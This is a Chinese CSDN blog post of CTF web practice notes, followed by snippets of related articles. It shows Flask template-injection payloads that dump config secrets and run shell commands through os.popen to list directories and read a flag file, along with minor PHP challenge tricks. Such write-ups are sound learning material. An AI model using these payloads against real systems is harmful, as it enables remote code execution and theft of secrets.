web刷题笔记

最新推荐文章于 2023-12-31 11:53:13 发布
最新推荐文章于 2023-12-31 11:53:13 发布
阅读量279 收藏
点赞数
文章标签: flask python 后端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/limerenc_lin/article/details/123295854
版权

Flask:一个Python编写的Web 微框架,让我们可以使用Python语言快速实现一个网站或Web服务。我们经常设置一个secret_key变量,所以我们要读取secret_key变量,导出所有config变量,其中就包括SECRET_KEY,需要在题目url后面添加/?flag={{config.items()}}

当what以GET形式接受到flag参数时,输出FLAG

则在url后加?what=flag即可得到flag直接查看源代码,is_numeric($num))检测是不是为数字,只要后面跟着的不是数字而是字符串就行了,1+一个字符串即可

Unicode编码

flag{b98c4107dd8ef3c8d77042bdb9d57517}

打开后,题目提示存在模板注入

先进行ls查看一下存在的文件。

/?flag={{%20config.__class__.__init__.__globals__[%27os%27].popen(%27ls%20../%27).read()%20}}1

发现存在一些文件夹,进行一个个进入查看,运气很好,第一个看的app文件夹里就有flag

因为没有过滤直接cat ../app/flag

?flag={{%20config.__class__.__init__.__globals__[%27os%27].popen(%27cat%20../app/flag%27).read()%20}}

Linas灬
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
JavaWeb在线刷题系统
qq_55144514的博客
06-25 2658
如今面试、考研越来越卷了,每场面试必考八股文,所以不得不背诵面试题。 但网上的面试题过于分散、很多面经也是只有问题没有题解,就导致我们需要一个个去搜索、或者关注这号那号去领取别人整理好的面试题,很麻烦。 因此,做了一个专注考研、面试刷题的网站。有了它,大家可以直接一站式在线刷题看题解,告别搜索和求人,大大提高复习效率。希望它能帮助大家拿到理想的 offer。...
有哪些好的刷题网站?2017年最受欢迎的编程挑战网站
热门推荐
程序猿
11-27 1万+
程序猿(ID:imkuqin) 猿妹编译 编译自:https://medium.freecodecamp.org/the-10-most-popular-coding-challenge-websites-of-2016-fb8a5672d22f 编程几乎已经成为了人类所知每个行业的必要组成部分,如今有越来越多的人开始了他们的编程之旅。 如果你正在
web刷题
LL123412138的博客
08-11 137
WarmUp 查看源文件,提示了source.php,那我们就去看看source.php有什么东西。 /source.php 一堆代码,我们慢慢看,很明显,有一个emm的类,类里面有一个checkFile函数,需要传入一个参数page,并返回布尔值。接下来简单了解一些基本函数。 isset:判断是否为空 in_array:判断是否在数组中 mb_substr:获取字符串的指定字段 mb_strpos:获取指定字符出现在字符串的位置 is_string:判断是否全为字符 来,我们再来看看这段程序。 程序获
刷题网站
WEB_CSDN_SHARE的博客
12-03 2744
http://scriptoj.mangojuice.top/ https://leetcode-cn.com/problemset/all/ https://leetcode.com/
Bugku刷题--WEB
chenmou40的博客
06-16 464
1.Simple_SSTI_1 解法: 在URL中构造 ?flag={{config.SECRET_KEY}} 审题: 相关知识点: Python沙盒绕过 模板注入(STTI) 模板引擎(STT) 2.Simple_SSTI_1 解题: 1.工具:tqlmap 2.手工 3.Flask_FileUpload 解法: 创建一个文件,写python代码,修改文件格式为 .jpg import os os.system('cat /flag') 修改文件格式方法自行搜索 审题: <!-- Give m.
谷歌师兄的leetcode刷题笔记-DH-HackBar:DH黑客吧。高级Web渗透测试工具
06-30
谷歌师兄的leetcode刷题笔记 免责声明:此工具仅用于道德渗透测试和学习目的。 我们从不支持或挑起任何不道德、有害和非法的活动。 开发人员将不对工具的任何滥用负责。 下载 :inbox_tray: 关于 DH 黑客吧 DH ...
谷歌师兄的leetcode刷题笔记-momentum_public_web:Momentum的公共网站
06-30
谷歌师兄的leetcode刷题笔记动力是给男人的 我们的重点是男人的工作,并成为我们能做到的最好的男人。 我们支持男人拥有真正的友谊 当然,我们喜欢一起玩乐,但我们正在寻找更多的东西:与我们信任的伟人建立真正的...
谷歌师兄的leetcode刷题笔记-efwdrgtb:文件名
06-30
谷歌师兄的leetcode刷题笔记DiscordSpeechBot 一个语音到文本的机器人,用于与音乐命令不协调,更多的是用 NodeJS 编写的。 演示: 在我们的 Discord 服务器上亲自试用机器人: 您可以按照以下步骤启动并运行此...
谷歌师兄的leetcode刷题笔记-dis:说
06-30
谷歌师兄的leetcode刷题笔记DiscordSpeechBot 一个语音到文本的机器人,用于与音乐命令不协调,更多的是用 NodeJS 编写的。 演示: 在我们的 Discord 服务器上亲自试用机器人: 您可以按照以下步骤启动并运行此...
谷歌师兄的leetcode刷题笔记-go:去
06-30
谷歌师兄的leetcode刷题笔记DiscordSpeechBot 一个语音到文本的机器人,用于与音乐命令不协调,更多的是用 NodeJS 编写的。 演示: 在我们的 Discord 服务器上亲自试用机器人: 您可以按照以下步骤启动并运行此...
web刷题日记
qq_53579360的博客
09-22 85
ctf刷题
撩课-每天刷Web面试题(前10天汇总)
大灰狼的小绵羊哥哥的博客
11-29 692
原文https://mp.weixin.qq.com/s/euBfmBly7GnnYsk6Kgz2Yw 前言   后台很多小伙伴给我发私信说公众号上面试题刷不了了,因为之前系统迁移导致数据丢失。   目前在撩课官网(itlike.com)上三大学科&lt;H5、Java、Python&gt;每天都在同步更新5-10道企业最新面试题,童鞋们可以根据自己需要进行回顾、准备和刷题。   华...
CTFSHOW web入门刷题 web98-112
最新发布
bys617120的博客
12-31 922
可以传递给v3任意值,然后v1=flag=v3的md5值,这里选择让v3为数组类型从而使得md5值为空,v1=v2后md5也为空。函数的限制,v2应该被赋值一个纯数字字符串,并且这个字符串的前面应该加上两个混淆字符以便函数体对方法进行正确调用。,v3变量应该传入一个文件名,并且将变量str中的数据传入到被定义的文件中,v3变量可以使用伪协议进行构建。用来写入文件,第一个参数是文件名,第二个参数是需要写进文件中的内容。调用方法或变量,第一个参数是调用的对象,第二个参数是被调用对象的参数。
2021.11.24【web刷题记录】
Aemilia的博客
11-24 759
报错注入 弱比较绕过 MD5和数字 序列化字符串的使用
ajax传值controller怎么写,ajax向 controller传值(示例代码)
weixin_39951295的博客
08-05 673
第一种传值:controller中是几个单独的基本类型参数@RequestMapping("update")@ResponseBody//此注解不能省略 否则ajax无法接受返回值public Map update(Long num, Long id, BigDecimal amount){Map resultMap = new HashMap();if(num == null || id == ...
# BUGKU Simple_SSTI_1-2
zbbjya的博客
03-17 744
##BUGKU Simple_SSTI_1 查看网页源代码 提示需要传一个flag参数,Flask 是一个微型的 Python 开发的 Web 框架, 由上可知flag在secret_key下,configflask模板中的一个全局对象而使用 /?flag={{config.items()}} 读取配置文件可得到,其数据,flag也在里面 /?flag={{config.SECRET_KEY}} 可直接得到flag Simple_SSTI_2 同样提示需要传一个flag参数 查看网
[CSCCTF 2019 Qual] FlaskLight
汗的博客
08-29 1544
信息收集 index大致就这样,没什么信息 F12看下,发现了线索:search参数 试下ssti 基本就是ssti了 漏洞利用 config 也是 Flask模版中的一个全局对象,它包含了所有应用程序的配置值。 {{ config.items() }} // 查看配置项目的信息 输入:http://xxxxx//?search={{%20config.items()%20}} 爆出一堆信息,这里获得第二个线索,flag在这个目录 You searched for: [('JSON_
Bugku、i春秋解题 web wp(一)
m0_55854679的博客
05-14 782
Simple_SSTI_1(python模板注入) 启动常见后只有一行字母,我们什么也看不出来。点击右键,查看网页源代码 倒数第三行绿色的字 <!-- You know, in the flask, We often set a secret_key variable.--> 意思是 你知道,在flask【一个Python编写的Web 微框架,让我们可以使用Python语言快速实现一个网站或Web服务。】里,我们经常设置一个secret_key变量,所以我们要读secret_key变量,导
labuladong的刷题笔记
09-12
"Labuladong"是一个著名的算法题解博主,他的刷题笔记非常受欢迎。他的笔记具有以下几个特点: 1. 思路清晰:Labuladong的刷题笔记总是能够很清晰地阐述解题思路。他善于将复杂的问题简化为易于理解的小问题,并...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值